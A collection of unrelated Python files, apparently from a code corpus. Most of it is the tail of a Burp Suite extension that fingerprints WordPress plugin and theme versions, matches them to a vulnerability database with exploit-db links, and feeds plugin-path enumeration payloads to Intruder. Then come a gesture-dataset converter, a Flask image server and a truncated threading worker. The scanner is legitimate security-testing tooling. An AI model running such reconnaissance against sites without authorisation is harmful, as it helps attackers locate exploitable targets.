# No bugs
if len(loaded_json[name]['vulnerabilities']) == 0:
continue
for vulnerability in loaded_json[name]['vulnerabilities']:
bug = {'id': vulnerability['id'], 'title': vulnerability['title'].encode('utf-8'),
'vuln_type': vulnerability['vuln_type'].encode('utf-8'), 'reference': ''}
if 'references' in vulnerability:
if 'url' in vulnerability['references']:
references = []
for reference_url in vulnerability['references']['url']:
references.append(reference_url.encode('utf-8'))
if len(references) != 0:
bug['reference'] = references
if 'cve' in vulnerability:
bug['cve'] = vulnerability['cve'].encode('utf-8')
if 'exploitdb' in vulnerability:
bug['exploitdb'] = vulnerability['exploitdb'][0].encode('utf-8')
# Sometimes there is no fixed in or its None
if 'fixed_in' in vulnerability and vulnerability['fixed_in']:
bug['fixed_in'] = vulnerability['fixed_in'].encode('utf-8')
else:
bug['fixed_in'] = '0'
bugs.append(bug)
temp_database[name] = bugs
progress_adder += int(100 / progress_divider)
self.database[_type] = temp_database
self.update_config('sha_{}'.format(_type), sha_original)
except:
self.print_debug("_update_database parser error for {}: {}".format(_type, traceback.format_exc()))
return False
return True
def scan_type_check(self, messageInfo, as_thread):
if as_thread:
if self.config.get('scan_type', 1) == 1:
threading.Thread(target=self.check_url_or_body, args=(messageInfo, "plugins",)).start()
threading.Thread(target=self.check_url_or_body, args=(messageInfo, "themes",)).start()
elif self.config.get('scan_type', 1) == 2:
threading.Thread(target=self.check_url_or_body, args=(messageInfo, "plugins",)).start()
elif self.config.get('scan_type', 1) == 3:
threading.Thread(target=self.check_url_or_body, args=(messageInfo, "themes",)).start()
if self.config.get('admin_ajax', True):
threading.Thread(target=self.check_admin_ajax, args=(messageInfo,)).start()
else:
issues = []
if self.config.get('scan_type', 1) == 1:
issues += self.check_url_or_body(messageInfo, "plugins")
issues += (self.check_url_or_body(messageInfo, "themes") or [])
elif self.config.get('scan_type', 1) == 2:
issues += self.check_url_or_body(messageInfo, "plugins")
elif self.config.get('scan_type', 1) == 3:
issues += (self.check_url_or_body(messageInfo, "themes") or [])
if self.config.get('admin_ajax', True):
issues += self.check_admin_ajax(messageInfo)
return issues
# implement IScannerCheck
def doPassiveScan(self, baseRequestResponse):
return self.scan_type_check(baseRequestResponse, False)
def consolidateDuplicateIssues(self, existingIssue, newIssue):
return 1
# implement IHttpListener
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
if self.is_burp_pro or messageIsRequest:
return
# We are interested only with valid requests
response = self.helpers.analyzeResponse(messageInfo.getResponse())
if response.getStatusCode() not in INTERESTING_CODES:
return
if toolFlag == IBurpExtenderCallbacks.TOOL_PROXY:
self.scan_type_check(messageInfo, True)
def check_url_or_body(self, base_request_response, _type):
if self.config.get('full_body', False):
return self.check_body(base_request_response, _type)
else:
return self.check_url(base_request_response, _type)
def check_url(self, base_request_response, _type):
try:
wp_content_pattern = bytearray(
"{}/{}/".format(self.config.get('wp_content', 'wp-content'), _type))
url = str(self.helpers.analyzeRequest(base_request_response).getUrl())
wp_content_begin_in_url = self.helpers.indexOf(url, wp_content_pattern, True, 0, len(url))
if wp_content_begin_in_url == -1:
return []
regexp_plugin_name = re.compile(
"{}/{}/([A-Za-z0-9_-]+)".format(self.config.get('wp_content', 'wp-content'), _type), re.IGNORECASE)
plugin_name_regexp = regexp_plugin_name.search(url)
if plugin_name_regexp:
current_domain_not_normalized = url[0:wp_content_begin_in_url]
current_domain = self.normalize_url(current_domain_not_normalized)
plugin_name = plugin_name_regexp.group(1).lower()
if self.is_unique_plugin_on_website(current_domain, plugin_name):
version_type = 'active'
[version_number, version_request] = self.active_scan(current_domain_not_normalized, _type,
plugin_name,
base_request_response)
request = base_request_response.getRequest()
wp_content_begin = self.helpers.indexOf(request, wp_content_pattern, True, 0, len(request))
markers = [
array('i', [wp_content_begin, wp_content_begin + len(wp_content_pattern) + len(plugin_name)])]
if version_number == '0':
version_number_regexp = self.regexp_version_number.search(url)
if version_number_regexp:
version_number = version_number_regexp.group(1).rstrip(".")
version_type = 'passive'
version_number_begin = self.helpers.indexOf(request,
self.helpers.stringToBytes(version_number),
True, 0,
len(request))
markers.append(
array('i', [version_number_begin, version_number_begin + len(version_number)]))
return self.is_vulnerable_plugin_version(self.callbacks.applyMarkers(base_request_response, markers, None),
_type, plugin_name, version_number, version_type, version_request)
return []
except:
self.print_debug("[-] check_url error: {}".format(traceback.format_exc()))
return []
def check_admin_ajax(self, base_request_response):
admin_ajax_pattern = bytearray("admin-ajax.php")
analyzed_request = self.helpers.analyzeRequest(base_request_response)
url = str(analyzed_request.getUrl())
is_admin_ajax = self.helpers.indexOf(url, admin_ajax_pattern, False, 0, len(url))
if is_admin_ajax == -1:
return []
issues = []
parameters = analyzed_request.getParameters()
for parameter in parameters:
if parameter.getName() == 'action':
action_value = parameter.getValue()
self.print_debug("[+] check_admin_ajax action_value: {}".format(action_value))
plugins_list = self.database.get('admin_ajax', {}).get(action_value, None)
if plugins_list:
current_domain_not_normalized = url[0:is_admin_ajax]
current_domain = self.normalize_url(current_domain_not_normalized)
for plugin_name in plugins_list:
if self.is_unique_plugin_on_website(current_domain, plugin_name):
issues += self.is_vulnerable_plugin_version(base_request_response, "plugins", plugin_name, '0', 'passive', None)
break
return issues
def check_body(self, base_request_response, _type):
response = base_request_response.getResponse()
wp_content_pattern = bytearray(
"{}/{}/".format(self.config.get('wp_content', 'wp-content'), _type))
matches = self.find_pattern_in_data(response, wp_content_pattern)
if not matches:
return []
url = str(self.helpers.analyzeRequest(base_request_response).getUrl())
current_domain = self.normalize_url(url)
regexp_plugin_name = re.compile(
"{}/{}/([A-Za-z0-9_-]+)".format(self.config.get('wp_content', 'wp-content'), _type), re.IGNORECASE)
issues = []
for wp_content_start, wp_content_stop in matches:
# For performance reason only part of reponse
response_partial_after = self.helpers.bytesToString(
self.array_slice_bytes(response, wp_content_start, wp_content_stop + 100))
plugin_name_regexp = regexp_plugin_name.search(response_partial_after)
if plugin_name_regexp:
plugin_name = plugin_name_regexp.group(1).lower()
if self.is_unique_plugin_on_website(current_domain, plugin_name):
response_partial_before = self.helpers.bytesToString(
self.array_slice_bytes(response, wp_content_start - 100, wp_content_start)).lower()
markers = [array('i', [wp_content_start, wp_content_stop + len(plugin_name)])]
version_type = 'active'
version_number = '0'
version_request = None
url_begin_index = response_partial_before.rfind('http://')
if url_begin_index == -1:
url_begin_index = response_partial_before.rfind('https://')
if url_begin_index == -1:
url_begin_index = response_partial_before.rfind('//')
if url_begin_index != -1:
[version_number, version_request] = self.active_scan(
response_partial_before[url_begin_index:],
_type, plugin_name, base_request_response)
if version_number == '0':
# https://stackoverflow.com/questions/30020184/how-to-find-the-first-index-of-any-of-a-set-of-characters-in-a-string
url_end_index = next(
(i for i, ch in enumerate(response_partial_after) if ch in {"'", "\"", ")"}),
None)
if url_end_index:
url_end = response_partial_after[0:url_end_index]
version_number_regexp = self.regexp_version_number.search(url_end)
if version_number_regexp:
version_number = version_number_regexp.group(1).rstrip(".")
version_type = 'passive'
version_marker_start = url_end.find(version_number)
markers.append(array('i', [wp_content_start + version_marker_start,
wp_content_start + version_marker_start + len(
version_number)]))
issues += self.is_vulnerable_plugin_version(self.callbacks.applyMarkers(base_request_response, None, markers),
_type, plugin_name, version_number, version_type, version_request)
return issues
def find_pattern_in_data(self, data, pattern):
matches = []
start = 0
data_length = len(data)
pattern_length = len(pattern)
while start < data_length:
# indexOf(byte[] data, byte[] pattern, boolean caseSensitive, int from, int to)
start = self.helpers.indexOf(data, pattern, False, start, data_length)
if start == -1:
break
matches.append(array('i', [start, start + pattern_length]))
start += pattern_length
return matches
def array_slice_bytes(self, _bytes, start, stop):
byte_length = len(_bytes)
if stop > byte_length:
stop = byte_length
if start < 0:
start = 0
temp = []
for i in xrange(start, stop):
temp.append(_bytes[i])
return array('b', temp)
def normalize_url(self, url):
parsed_url = urlparse.urlparse(url)
current_domain = parsed_url.netloc
# Domain may looks like www.sth.pl:80, so here we normalize this
if current_domain.startswith('www.'):
current_domain = current_domain[4:]
if ":" in current_domain:
current_domain = current_domain.split(":")[0]
self.print_debug("[*] normalize_url before: {}, after: {}".format(url, current_domain))
return current_domain
def add_issue_wrapper(self, issue):
self.lock_issues.acquire()
row = self.list_issues.size()
self.list_issues.add(issue)
self.table_issues.fireTableRowsInserted(row, row)
self.lock_issues.release()
return issue
def active_scan(self, current_domain, _type, plugin_name, base_request_response):
current_version = '0'
readme_http_request = None
markers = None
if self.config.get('active_scan', False):
url = str(self.helpers.analyzeRequest(base_request_response).getUrl()).lower()
self.print_debug("Current domain: {}, URL: {}".format(current_domain, url))
if current_domain.startswith('//'):
if url.startswith('http://'):
current_domain = 'http://' + current_domain[2:]
else:
current_domain = 'https://' + current_domain[2:]
elif not current_domain.startswith('http'):
if url.startswith('http://'):
current_domain = 'http://' + current_domain
else:
current_domain = 'https://' + current_domain
readme_url = "{}{}/{}/{}/readme.txt".format(current_domain, self.config.get('wp_content', 'wp-content'),
_type, plugin_name)
self.print_debug("[*] active_scan readme_url: {}".format(readme_url))
try:
if url.endswith('readme.txt'):
# This might be potential recursion, so don't make another request here
return ['0', None]
readme_request = self.helpers.buildHttpRequest(URL(readme_url))
readme_http_request = self.callbacks.makeHttpRequest(base_request_response.getHttpService(),
readme_request)
readme_response = readme_http_request.getResponse()
readme_response_info = self.helpers.analyzeResponse(readme_response)
if readme_response_info.getStatusCode() in INTERESTING_CODES:
# Idea from wpscan\lib\common\models\wp_item\versionable.rb
readme_content = self.helpers.bytesToString(readme_response)
regexp_stable_tag = self.regexp_stable_tag.search(readme_content)
if regexp_stable_tag:
stable_tag = regexp_stable_tag.group(1)
current_version = stable_tag
markers = [array('i', [regexp_stable_tag.start(1), regexp_stable_tag.end(1)])]
self.print_debug("[*] active_scan stable tag: {}".format(stable_tag))
changelog_regexp = self.regexp_version_from_changelog.finditer(readme_content)
for version_match in changelog_regexp:
version = version_match.group(1)
if LooseVersion(version) > LooseVersion(current_version):
self.print_debug("[*] active_scan newer version: {}".format(version))
current_version = version
markers = [array('i', [version_match.start(1), version_match.end(1)])]
if markers:
readme_http_request = self.callbacks.applyMarkers(readme_http_request, None, markers)
except:
self.print_debug(
"[-] active_scan for {} error: {}".format(readme_url, traceback.format_exc()))
return ['0', None]
return [current_version, readme_http_request]
def is_unique_plugin_on_website(self, url, plugin_name):
if plugin_name not in self.list_plugins_on_website[url]:
self.list_plugins_on_website[url].append(plugin_name)
self.print_debug("[+] is_unique_plugin_on_website URL: {}, plugin: {}".format(url, plugin_name))
return True
return False
def parse_bug_details(self, bug, plugin_name, _type):
content = "ID: <a href='https://wpvulndb.com/vulnerabilities/{}'>{}</a><br />Title: {}<br />Type: {}<br />".format(
bug['id'], bug['id'], bug['title'], bug['vuln_type'])
if 'reference' in bug:
content += "References:<br />"
for reference in bug['reference']:
content += "<a href='{}'>{}</a><br />".format(reference, reference)
if 'cve' in bug:
content += "CVE: {}<br />".format(bug['cve'])
if 'exploitdb' in bug:
content += "Exploit Database: <a href='https://www.exploit-db.com/exploits/{}/'>{}</a><br />".format(
bug['exploitdb'], bug['exploitdb'])
if 'fixed_in' in bug:
content += "Fixed in version: {}<br />".format(bug['fixed_in'])
content += "WordPress URL: <a href='https://wordpress.org/{type}/{plugin_name}'>https://wordpress.org/{type}/{plugin_name}</a>".format(
type=_type, plugin_name=plugin_name)
return content
def is_vulnerable_plugin_version(self, base_request_response, _type, plugin_name, version_number, version_type,
version_request):
has_vuln = False
issues = []
if version_type == 'active' and version_number != '0':
requests = [base_request_response, version_request]
else:
requests = [base_request_response]
url = self.helpers.analyzeRequest(base_request_response).getUrl()
if plugin_name in self.database[_type]:
self.print_debug(
"[*] is_vulnerable_plugin_version check {} {} version {}".format(_type, plugin_name, version_number))
for bug in self.database[_type][plugin_name]:
if bug['fixed_in'] == '0' or (
version_number != '0' and LooseVersion(version_number) < LooseVersion(bug['fixed_in'])):
self.print_debug(
"[+] is_vulnerable_plugin_version vulnerability inside {} version {}".format(plugin_name,
version_number))
has_vuln = True
issues.append(self.add_issue_wrapper(CustomScanIssue(
url,
requests,
"{} inside {} {} version {}".format(bug['vuln_type'], _type[:-1], plugin_name, version_number),
self.parse_bug_details(bug, plugin_name, _type),
"High", "Certain" if version_type == 'active' else "Firm")))
elif self.config.get('all_vulns', False):
self.print_debug(
"[+] is_vulnerable_plugin_version potential vulnerability inside {} version {}".format(
plugin_name, version_number))
has_vuln = True
issues.append(self.add_issue_wrapper(CustomScanIssue(
url,
requests,
"Potential {} inside {} {} fixed in {}".format(bug['vuln_type'], _type[:-1], plugin_name,
bug['fixed_in']),
self.parse_bug_details(bug, plugin_name, _type),
"Information", "Certain")))
if not has_vuln and self.config.get('print_info', False):
print_info_details = "Found {} {}".format(_type[:-1], plugin_name)
if version_number != '0':
print_info_details += " version {}".format(version_number)
self.print_debug("[+] is_vulnerable_plugin_version print info: {}".format(print_info_details))
issues.append(self.add_issue_wrapper(CustomScanIssue(
url,
requests,
print_info_details,
"{}<br /><a href='https://wordpress.org/{type}/{plugin_name}'>https://wordpress.org/{type}/{plugin_name}</a>".format(
print_info_details, type=_type, plugin_name=plugin_name),
"Information", "Certain" if version_type == 'active' and version_number != '0' else "Firm")))
return issues
def createMenuItems(self, invocation):
return [JMenuItem("Send to WordPress Scanner Intruder",
actionPerformed=lambda x, inv=invocation: self.menu_send_to_intruder_on_click(inv))]
def menu_send_to_intruder_on_click(self, invocation):
response = invocation.getSelectedMessages()[0]
http_service = response.getHttpService()
request = response.getRequest()
analyzed_request = self.helpers.analyzeRequest(response)
for param in analyzed_request.getParameters():
# Remove all POST and GET parameters
if param.getType() == IParameter.PARAM_COOKIE:
continue
request = self.helpers.removeParameter(request, param)
# Convert to GET
is_post = self.helpers.indexOf(request, bytearray("POST"), True, 0, 4)
if is_post != -1:
request = self.helpers.toggleRequestMethod(request)
# Add backslash to last part of url
url = str(analyzed_request.getUrl())
if not url.endswith("/"):
request_string = self.helpers.bytesToString(request)
# We are finding HTTP version protocol
http_index = request_string.find(" HTTP")
new_request_string = request_string[0:http_index] + "/" + request_string[http_index:]
request = self.helpers.stringToBytes(new_request_string)
http_index_new_request = self.helpers.indexOf(request, bytearray(" HTTP"), True, 0, len(request))
matches = [array('i', [http_index_new_request, http_index_new_request])]
self.callbacks.sendToIntruder(http_service.getHost(), http_service.getPort(),
True if http_service.getProtocol() == "https" else False, request, matches)
# implement IMessageEditorController
def getHttpService(self):
return self._current_advisory_entry.getHttpService()
def getRequest(self):
return self._current_advisory_entry.getRequest()
def getResponse(self):
return self._current_advisory_entry.getResponse()
# implement ITab
def getTabCaption(self):
return "WordPress Scanner"
def getUiComponent(self):
return self.panel_main
class CustomScanIssue(IScanIssue):
def __init__(self, url, http_messages, name, detail, severity, confidence):
self._url = url
self._http_messages = http_messages
self._name = name
self._detail = detail
# High, Medium, Low, Information, False positive
self._severity = severity
# Certain, Firm, Tentative
self._confidence = confidence
def getUrl(self):
return self._url
def getIssueName(self):
return self._name
def getIssueType(self):
return 0
def getSeverity(self):
return self._severity
def getConfidence(self):
return self._confidence
def getIssueBackground(self):
pass
def getRemediationBackground(self):
pass
def getIssueDetail(self):
return self._detail
def getRemediationDetail(self):
pass
def getHttpMessages(self):
return self._http_messages
def getHttpService(self):
return self.getHttpMessages()[0].getHttpService()
def getRequest(self, number):
if len(self._http_messages) > number:
return self._http_messages[number].getRequest()
else:
return ""
def getResponse(self, number):
if len(self._http_messages) > number:
return self._http_messages[number].getResponse()
else:
return ""
def getHost(self):
host = "{}://{}".format(self.getHttpService().getProtocol(), self.getHttpService().getHost())
port = self.getHttpService().getPort()
if port not in [80, 443]:
host += ":{}".format(port)
return host
def getPath(self):
url = str(self.getUrl())
spliced = url.split("/")
return "/" + "/".join(spliced[3:])
class IssuesDetailsTable(JTable):
def __init__(self, extender, model):
self._extender = extender
self.setModel(model)
def changeSelection(self, row, col, toggle, extend):
model_row = self.convertRowIndexToModel(row)
self.current_issue = self._extender.list_issues.get(model_row)
issue_details = self.current_issue.getIssueDetail()
self._extender.panel_bottom_advisory.setText(issue_details)
self._extender.panel_bottom_request1.setMessage(self.current_issue.getRequest(0), True)
self._extender.panel_bottom_response1.setMessage(self.current_issue.getResponse(0), False)
request2 = self.current_issue.getRequest(1)
if request2 != "":
self._extender.panel_bottom.setEnabledAt(3, True)
self._extender.panel_bottom.setEnabledAt(4, True)
self._extender.panel_bottom_request2.setMessage(request2, True)
self._extender.panel_bottom_response2.setMessage(self.current_issue.getResponse(1), False)
else:
self._extender.panel_bottom.setEnabledAt(3, False)
self._extender.panel_bottom.setEnabledAt(4, False)
JTable.changeSelection(self, row, col, toggle, extend)
class IssuesTableModel(AbstractTableModel):
def __init__(self, extender):
self._extender = extender
def getRowCount(self):
try:
return self._extender.list_issues.size()
except:
return 0
def getColumnCount(self):
return 5
def getColumnName(self, column_index):
if column_index == 0:
return "Issue type"
elif column_index == 1:
return "Host"
elif column_index == 2:
return "Path"
elif column_index == 3:
return "Severity"
elif column_index == 4:
return "Confidence"
def getValueAt(self, row_index, column_index):
advisory_entry = self._extender.list_issues.get(row_index)
if column_index == 0:
return advisory_entry.getIssueName()
elif column_index == 1:
return advisory_entry.getHost()
elif column_index == 2:
return advisory_entry.getPath()
elif column_index == 3:
return advisory_entry.getSeverity()
elif column_index == 4:
return advisory_entry.getConfidence()
class IntruderPluginsGenerator(IIntruderPayloadGeneratorFactory):
def __init__(self, generator):
self.generator = generator
def getGeneratorName(self):
return "WordPress Plugins"
def createNewInstance(self, attack):
return IntruderPayloadGenerator(self.generator, "plugins")
class IntruderThemesGenerator(IIntruderPayloadGeneratorFactory):
def __init__(self, generator):
self.generator = generator
def getGeneratorName(self):
return "WordPress Themes"
def createNewInstance(self, attack):
return IntruderPayloadGenerator(self.generator, "themes")
class IntruderPluginsThemesGenerator(IIntruderPayloadGeneratorFactory):
def __init__(self, generator):
self.generator = generator
def getGeneratorName(self):
return "WordPress Plugins and Themes"
def createNewInstance(self, attack):
return IntruderPayloadGeneratorMixed(self.generator)
class IntruderPayloadGenerator(IIntruderPayloadGenerator):
def __init__(self, extender, _type):
self.payload_index = 0
self.extender = extender
self.type = _type
self.iterator = self.extender.database[self.type].iteritems()
self.iterator_length = len(self.extender.database[self.type])
self.extender.print_debug("[+] Start intruder for {}, has {} payloads".format(self.type, self.iterator_length))
def hasMorePayloads(self):
return self.payload_index < self.iterator_length
def getNextPayload(self, base_value):
if self.payload_index <= self.iterator_length:
try:
k, v = self.iterator.next()
self.payload_index += 1
return "{}/{}/{}/".format(self.extender.config.get('wp_content', 'wp-content'), self.type, k)
except StopIteration:
pass
def reset(self):
self.payload_index = 0
class IntruderPayloadGeneratorMixed(IIntruderPayloadGenerator):
def __init__(self, extender):
self.payload_index = 0
self.extender = extender
self.iterator = chain(self.extender.database["themes"].iteritems(),
self.extender.database["plugins"].iteritems())
self.iterator_themes_length = len(self.extender.database["themes"])
self.iterator_length = (self.iterator_themes_length + len(self.extender.database["plugins"]))
self.extender.print_debug("[+] Start mixed intruder, has {} payloads".format(self.iterator_length))
def hasMorePayloads(self):
return self.payload_index <= self.iterator_length
def getNextPayload(self, base_value):
if self.payload_index < self.iterator_length:
try:
k, v = self.iterator.next()
self.payload_index += 1
if self.payload_index <= self.iterator_themes_length:
return "{}/{}/{}/".format(self.extender.config.get('wp_content', 'wp-content'), "themes", k)
else:
return "{}/{}/{}/".format(self.extender.config.get('wp_content', 'wp-content'), "plugins", k)
except StopIteration:
pass
def reset(self):
self.payload_index = 0
|
msrc12_skels_to_h5.py
|
from __future__ import absolute_import, division, print_function
import os
import numpy as np
import h5py as h5
import re
import csv
from glob import glob
from tqdm import trange
import shutil
import time
from multiprocessing import Process, Queue, current_process, freeze_support
def worker(input, output):
prog = re.compile('MicrosoftGestureDataset-RC/data/P(\d)_(\d)_(\d*).*_p(\d*).tagstream',re.IGNORECASE)
for found_file in iter(input.get, 'STOP'):
confpars = prog.findall(found_file)[0]
instruction = (int(confpars[0]), int(confpars[1]))
action = int(confpars[2])
subject = int(confpars[3])
with open(found_file) as csvfile:
tags_reader = csv.reader(csvfile, delimiter=';')
tags = []
for r, row in enumerate(tags_reader):
if r == 0:
assert(row[0] == 'XQPCTick')
else:
tag = (int(row[0])*1000 + (49875/2))/49875
tags.append(tag)
frame_count = 0
pose_arrays = []
data_file = found_file[:-10]+'.csv'
with open(data_file) as csvfile:
skelreader = csv.reader(csvfile, delimiter=' ')
for tag in tags:
current_frame = 0
skels = []
while current_frame < tag:
row = next(skelreader)
current_frame = int(row[0])
skel = np.reshape(np.array(row[1:], dtype=np.float32), [20, 4, 1])
skels.append(skel)
pose_arrays.append(np.concatenate(skels,axis=2))
frame_count = max(frame_count, len(skels))
output.put((subject, action, pose_arrays, frame_count))
if __name__ == '__main__':
found_dirs = [file for file in glob('MicrosoftGestureDataset-RC/data/*.tagstream')]
print('Processing %d files...' % (len(found_dirs)))
data_set = 'MSRC12'
h5file = h5.File(data_set+"v1.h5", "w")
subjects = set()
actions = set()
max_frame_count = 0
num_procs = 4
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for found_dir in found_dirs:
task_queue.put(found_dir)
# Start worker processes
print('Spawning processes...')
for _ in range(num_procs):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
print('Processed Files:')
t = trange(len(found_dirs), dynamic_ncols=True)
seq_num = 0
for _ in t:
subject, action, pose_arrays, frame_count = done_queue.get()
subjects.add(subject)
actions.add(action)
sub_array = np.array(subject)
act_array = np.array(action)
max_frame_count = max(frame_count, max_frame_count)
# v1 split (cross subject protocol)
data_split = 'Train' if (subject % 2) == 1 else 'Validate'
for pose_array in pose_arrays:
data_path = '{}/{}/SEQ{}/'.format(data_set, data_split, seq_num)
h5file.create_dataset(
data_path + 'Subject', np.shape(sub_array),
dtype='int32', data=sub_array
)
h5file.create_dataset(
data_path + 'Action', np.shape(act_array),
dtype='int32', data=act_array
)
h5file.create_dataset(
data_path + 'Pose', np.shape(pose_array),
dtype='float32', data=pose_array
)
seq_num += 1
# Tell child processes to stop
print('Stopping processes...')
for _ in range(num_procs):
task_queue.put('STOP')
h5file.flush()
h5file.close()
print("")
print("done.")
print("Subjects: ", subjects)
print("Actions: ", actions)
print("Max Frame Count:", max_frame_count)
|
image_server.py
|
import logging
import time
from threading import Lock
from threading import Thread
import requests
from flask import Flask
from flask import redirect
from flask import request
from werkzeug.wrappers import Response
import arc852.cli_args as cli
from arc852.constants import CAMERA_NAME_DEFAULT
from arc852.constants import HTTP_HOST_DEFAULT, HTTP_DELAY_SECS_DEFAULT, HTTP_PORT_DEFAULT
from arc852.opencv_utils import encode_image
logger = logging.getLogger(__name__)
_image_endpoint_url = "/image.jpg"
class ImageServer(object):
args = [cli.template_file, cli.http_port, cli.http_delay_secs, cli.http_verbose]
def __init__(self,
template_file,
camera_name=CAMERA_NAME_DEFAULT,
http_host=HTTP_HOST_DEFAULT,
http_delay_secs=HTTP_DELAY_SECS_DEFAULT,
http_verbose=False,
log_info=logger.info,
log_debug=logger.debug,
log_error=logger.error):
self.__template_file = template_file
self.__camera_name = camera_name
self.__http_host = http_host
self.__http_delay_secs = http_delay_secs
self.__log_info = log_info
self.__log_debug = log_debug
self.__log_error = log_error
vals = self.__http_host.split(":")
self.__host = vals[0]
self.__port = vals[1] if len(vals) == 2 else HTTP_PORT_DEFAULT
self.__current_image_lock = Lock()
self.__current_image = None
self.__ready_to_stop = False
self.__flask_launched = False
self.__ready_to_serve = False
self.__started = False
self.__stopped = False
if not http_verbose:
class FlaskFilter(logging.Filter):
def __init__(self, fname):
super(FlaskFilter, self).__init__()
self.__fname = "GET {0}".format(fname)
def filter(self, record):
return self.__fname not in record.msg
logging.getLogger('werkzeug').addFilter(FlaskFilter(_image_endpoint_url))
@property
def image(self):
with self.__current_image_lock:
if self.__current_image is None:
return []
return self.__current_image
@image.setter
def image(self, image):
# Wait until potential sleep in start() has completed
if not self.__ready_to_serve:
return
if not self.__started:
self.__log_error("ImageServer.start() not called")
return
if not self.__flask_launched:
height, width = image.shape[:2]
self.__launch_flask(width, height)
with self.__current_image_lock:
# Encode to bytes if passed in as an nparray
if isinstance(image, bytes):
self.__current_image = image
else:
retval, buf = encode_image(image)
self.__current_image = buf.tobytes()
def __launch_flask(self, width, height):
flask = Flask(__name__)
@flask.route('/')
def index():
return redirect("/image?delay={0}".format(self.__http_delay_secs))
@flask.route('/image')
def image_option():
return get_page(request.args.get("delay"))
@flask.route("/image" + "/<string:delay>")
def image_path(delay):
return get_page(delay)
@flask.route(_image_endpoint_url)
def image_jpg():
response = Response(self.image, mimetype="image/jpeg")
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Pragma'] = 'no-cache'
return response
@flask.route("/__shutdown__", methods=['POST'])
def shutdown():
if not self.__ready_to_stop:
return "Not ready to stop"
shutdown_func = request.environ.get('werkzeug.server.shutdown')
if shutdown_func:
self.__stopped = True
shutdown_func()
return "Shutting down..."
def get_page(delay):
delay_secs = float(delay) if delay else self.__http_delay_secs
try:
with open(self.__template_file) as f:
html = f.read()
name = self.__camera_name
return html.replace("_TITLE_", name + " Camera") \
.replace("_DELAY_SECS_", str(delay_secs)) \
.replace("_NAME_", name) \
.replace("_WIDTH_", str(width)) \
.replace("_HEIGHT_", str(height)) \
.replace("_IMAGE_FNAME_", _image_endpoint_url)
except BaseException as e:
self.__log_error("Unable to create template file with %s [%s]", self.__template_file, e, exc_info=True)
time.sleep(1)
def run_http(flask_server, host, port):
while not self.__stopped:
try:
self.__log_info("Starting server with {0}:{1}".format(host, port))
flask_server.run(host=host, port=int(port))
except BaseException as e:
self.__log_error("Restarting HTTP server [%s]", e, exc_info=True)
time.sleep(1)
finally:
self.__log_info("HTTP server shutdown")
# Run HTTP server in a thread
Thread(target=run_http, kwargs={"flask_server": flask, "host": self.__host, "port": self.__port}).start()
self.__flask_launched = True
self.__log_info("Running HTTP server on http://%s:%s/", self.__host, self.__port)
def start(self):
if self.__started:
self.__log_error("ImageServer.start() already called")
return
if self.__flask_launched:
return
# Cannot start the flask server until the dimensions of the image are known
# So do not fire up the thread until the first image is available
self.__log_info("Starting ImageServer")
self.__log_info("Using template file %s", self.__template_file)
self.__log_info("Starting HTTP server on http://%s:%s/", self.__host, self.__port)
self.__ready_to_serve = True
self.__started = True
def stop(self):
if not self.__flask_launched:
return
self.__ready_to_stop = True
url = "http://{0}:{1}".format(self.__host, self.__port)
self.__log_info("Shutting down %s", url)
try:
requests.post("{0}/__shutdown__".format(url))
except requests.exceptions.ConnectionError:
self.__log_error("Unable to stop ImageServer")
|
worker.py
|
from dataclasses import dataclass, field
import threading
import time
import typing as tp
import stopit
from pypeln import utils as pypeln_utils
from . import utils
from .queue import IterableQueue, OutputQueues
WorkerConstructor = tp.Callable[[int, "StageParams", IterableQueue], "Worker"]
Kwargs = tp.Dict[str, tp.Any]
T = tp.TypeVar("T")
class ProcessFn(pypeln_utils.Protocol):
def __call__(self, worker: "Worker", **kwargs):
...
class StageParams(tp.NamedTuple):
input_queue: IterableQueue
output_queues: OutputQueues
lock: threading.Lock
namespace: utils.Namespace
@classmethod
def create(
cls, input_queue: IterableQueue, output_queues: OutputQueues, total_workers: int
) -> "StageParams":
return cls(
lock=threading.Lock(),
namespace=utils.Namespace(active_workers=total_workers),
input_queue=input_queue,
output_queues=output_queues,
)
def worker_done(self):
with self.lock:
self.namespace.active_workers -= 1
class WorkerInfo(tp.NamedTuple):
index: int
@dataclass
class Worker(tp.Generic[T]):
process_fn: ProcessFn
index: int
timeout: float
stage_params: StageParams
main_queue: IterableQueue
on_start: tp.Optional[tp.Callable[..., Kwargs]]
on_done: tp.Optional[tp.Callable[..., Kwargs]]
f_args: tp.List[str]
namespace: utils.Namespace = field(
default_factory=lambda: utils.Namespace(done=False, task_start_time=None)
)
process: tp.Optional[threading.Thread] = None
def __call__(self):
worker_info = WorkerInfo(index=self.index)
on_start_args: tp.List[str] = (
pypeln_utils.function_args(self.on_start) if self.on_start else []
)
on_done_args: tp.List[str] = (
pypeln_utils.function_args(self.on_done) if self.on_done else []
)
try:
if self.on_start is not None:
on_start_kwargs = dict(worker_info=worker_info)
kwargs = self.on_start(
**{
key: value
for key, value in on_start_kwargs.items()
if key in on_start_args
}
)
else:
kwargs = {}
if kwargs is None:
kwargs = {}
kwargs.setdefault("worker_info", worker_info)
self.process_fn(
self,
**{key: value for key, value in kwargs.items() if key in self.f_args},
)
self.stage_params.worker_done()
if self.on_done is not None:
kwargs.setdefault(
"stage_status",
StageStatus(
namespace=self.stage_params.namespace,
lock=self.stage_params.lock,
),
)
self.on_done(
**{
key: value
for key, value in kwargs.items()
if key in on_done_args
}
)
except pypeln_utils.StopThreadException:
pass
except BaseException as e:
try:
self.main_queue.raise_exception(e)
time.sleep(0.001)
except pypeln_utils.StopThreadException:
pass
finally:
self.namespace.done = True
self.stage_params.output_queues.done()
def start(self):
[self.process] = start_workers(self)
def stop(self):
if self.process is None:
return
self.namespace.task_start_time = None
if not self.process.is_alive():
return
stopit.async_raise(
self.process.ident,
pypeln_utils.StopThreadException,
)
def done(self):
self.namespace.done = True
def did_timeout(self):
return (
self.timeout
and not self.namespace.done
and self.namespace.task_start_time is not None
and (time.time() - self.namespace.task_start_time > self.timeout)
)
@dataclass
class MeasureTaskTime:
worker: "Worker"
def __enter__(self):
self.worker.namespace.task_start_time = time.time()
def __exit__(self, *args):
self.worker.namespace.task_start_time = None
def measure_task_time(self):
return self.MeasureTaskTime(self)
class Applicable(pypeln_utils.Protocol):
def apply(self, worker: "Worker", elem: tp.Any, **kwargs):
...
class ApplyProcess(ProcessFn, Applicable):
def __call__(self, worker: Worker, **kwargs):
for elem in worker.stage_params.input_queue:
